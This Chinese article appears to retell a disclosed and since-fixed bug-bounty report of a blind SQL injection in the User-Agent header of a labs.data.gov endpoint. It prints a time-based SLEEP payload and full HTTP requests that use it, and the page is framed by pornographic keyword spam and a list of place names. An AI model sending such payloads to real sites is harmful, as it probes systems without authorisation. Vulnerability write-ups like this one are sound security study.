中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何分析 HTTP頭注入中的User-Agent注入

發布時間:2021-12-10 15:31:44 來源:億速云 閱讀:153 作者:柒染 欄目:大數據

如何分析 HTTP頭注入中的User-Agent注入,很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。


漏洞信息
發現者:harisec

漏洞種類:SQL注入

危害等級:嚴重

漏洞狀態:已修復


前言
Harisec在以下網站中發現一個SQL注入漏洞,注入的位置在User-Agent。
https://labs.data.gov/dashboard/datagov/csv_to_json

漏洞再現
Harisec使用了盲注的方式來確認該漏洞

例如:將User-Agent的值設置為

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'

將導致服務器在25秒后響應

這里,我們看一下具體的數據包內容

GET /dashboard/datagov/csv_to_json HTTP/1.1Referer: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'X-Forwarded-For: 1X-Requested-With: XMLHttpRequestHost: labs.data.govConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*

如何分析 HTTP頭注入中的User-Agent注入

服務器在25秒后響應,與User-Agent的值相同

將User-Agent的值改一下,改成9秒后響應

GET /dashboard/datagov/csv_to_json HTTP/1.1Referer: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(3*3),0))OR'X-Forwarded-For: 1X-Requested-With: XMLHttpRequestHost: labs.data.govConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*

如何分析 HTTP頭注入中的User-Agent注入


漏洞影響

該漏洞可以使攻擊者注入惡意的SQL語句。

看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業資訊頻道,感謝您對億速云的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

三台县| 揭西县| 吐鲁番市| 大丰市| 田东县| 盐亭县| 醴陵市| 乐平市| 乡宁县| 正安县| 盱眙县| 望谟县| 余姚市| 工布江达县| 乐东| 东明县| 临夏市| 牡丹江市| 增城市| 香河县| 武陟县| 缙云县| 封丘县| 兴化市| 韩城市| 通海县| 湛江市| 新郑市| 吉安县| 阳原县| 富蕴县| 清新县| 隆回县| 通道| 漳平市| 桃源县| 汽车| 南澳县| 手机| 北海市| 家居|